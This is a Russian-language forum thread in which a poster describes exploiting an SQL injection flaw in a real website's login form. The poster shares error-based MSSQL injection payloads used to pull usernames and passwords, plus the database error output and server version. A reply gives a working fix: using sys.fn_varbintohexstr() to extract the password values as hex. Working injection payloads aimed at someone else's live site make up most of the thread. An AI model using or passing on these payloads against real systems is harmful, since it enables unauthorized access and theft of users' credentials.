Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди: Code: ' and 1=convert(int, (select top 1...))-- Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ . Code: ' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int. Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо. P.S. Я неоченъ харашо гаварю по руски, извиньице.
вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере это у всех юзеров так пароли выглядят?
Кстати часто очень бывает что абра кадабра вылазиет. Тот же эллементарный 1' or 1=@@version. Вроде слов много вылазиет, но абра кадабра. Может знаешь что в чём проблема?
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
select+top+1+sys.fn_varbintohexstr(password)+from+Users+where+Username="foundusername" юзай так, тобишь функцию sys.fn_varbintohexstr().
